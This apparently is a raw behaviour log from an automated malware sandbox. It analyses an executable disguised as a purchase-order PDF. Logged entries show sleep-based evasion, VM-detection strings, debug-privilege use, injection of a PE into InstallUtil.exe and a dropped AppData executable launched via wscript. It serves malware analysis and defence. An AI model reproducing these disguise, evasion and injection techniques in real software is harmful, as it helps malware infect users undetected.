                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeMemory allocated: 2B70000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeMemory allocated: 29B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeMemory allocated: 7560000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeMemory allocated: 8560000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2850000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2AA0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 29C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeMemory allocated: FC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeMemory allocated: 2930000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeMemory allocated: 4930000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeWindow / User API: threadDelayed 2792Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeWindow / User API: threadDelayed 7000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeWindow / User API: threadDelayed 2454Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeWindow / User API: threadDelayed 7317Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep count: 33 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 2268Thread sleep count: 2792 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 2268Thread sleep count: 7000 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -99875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -99766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -99656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -99547s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -99437s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -99328s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -99219s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -99094s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -98975s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -98859s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -98750s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -98641s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -98516s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -98404s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -98296s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -98187s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -98058s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -97953s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -97844s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -97734s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -97625s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -97516s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -97406s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -97297s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -97188s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -97063s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -96938s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -96828s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -96719s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -96594s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -96484s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -96375s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -96266s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -96156s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -96047s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -95938s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -95813s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -95703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -95592s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -95418s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -95312s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -95186s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -95001s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -94875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -94766s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -94656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe TID: 3544Thread sleep time: -94547s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep count: 31 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -28592453314249787s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 1016Thread sleep count: 2454 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -99859s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 1016Thread sleep count: 7317 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -99750s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -99641s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -99516s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -99391s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -99279s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -99172s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -99062s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -98953s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -98844s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -98735s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -98625s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -98515s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -98406s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -98269s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -98156s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -98034s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -97907s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -97782s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -97614s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -99936s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -99817s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -99703s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -99593s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -99484s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -99375s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -99265s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -99156s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -99047s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -98937s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -98828s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -98718s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -98609s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -98500s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -98390s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -98281s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -98172s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -98062s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -97953s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -99984s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -99875s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -99766s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -99643s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -99344s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -99219s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exe TID: 5840Thread sleep time: -99109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 99875Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 99766Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 99656Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 99547Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 99437Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 99328Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 99219Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 99094Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 98975Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 98859Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 98750Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 98641Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 98516Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 98404Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 98296Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 98187Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 98058Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 97953Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 97844Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 97734Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 97625Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 97516Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 97406Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 97297Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 97188Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 97063Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 96938Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 96828Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 96719Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 96594Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 96484Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 96375Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 96266Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 96156Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 96047Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 95938Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 95813Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 95703Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 95592Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 95418Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 95312Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 95186Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 95001Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 94875Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 94766Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 94656Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeThread delayed: delay time: 94547Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 99859Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 99750Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 99641Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 99516Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 99391Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 99279Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 99172Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 99062Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 98953Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 98844Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 98735Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 98625Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 98515Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 98406Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 98269Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 98156Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 98034Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 97907Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 97782Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 97614Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 99936Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 99817Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 99703Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 99593Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 99484Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 99375Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 99265Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 99156Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 99047Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 98937Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 98828Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 98718Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 98609Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 98500Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 98390Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 98281Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 98172Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 98062Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 97953Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 99984Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 99875Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 99766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 99643Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 99344Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 99219Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Directory.exeThread delayed: delay time: 99109Jump to behavior
                    Source: wscript.exe, 00000004.00000002.2310418107.000001BE77612000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                    Source: PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2200782194.0000000002C1A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                    Source: PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2200782194.0000000002C1A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                    Source: wscript.exe, 00000004.00000002.2310418107.000001BE77612000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
                    Source: PO#83298373729383838392387373873PDF.exe, 00000000.00000002.2198261378.0000000000D84000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllA
                    Source: InstallUtil.exe, 00000002.00000002.4606570277.00000000050E0000.00000004.00000020.00020000.00000000.sdmp, Directory.exe, 00000005.00000002.4586329023.0000000000DC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7C0000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7C0000Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7C2000Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: AE0000Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: AE2000Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 4D0008Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Directory.exe "C:\Users\user\AppData\Roaming\Directory.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeQueries volume information: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PO#83298373729383838392387373873PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
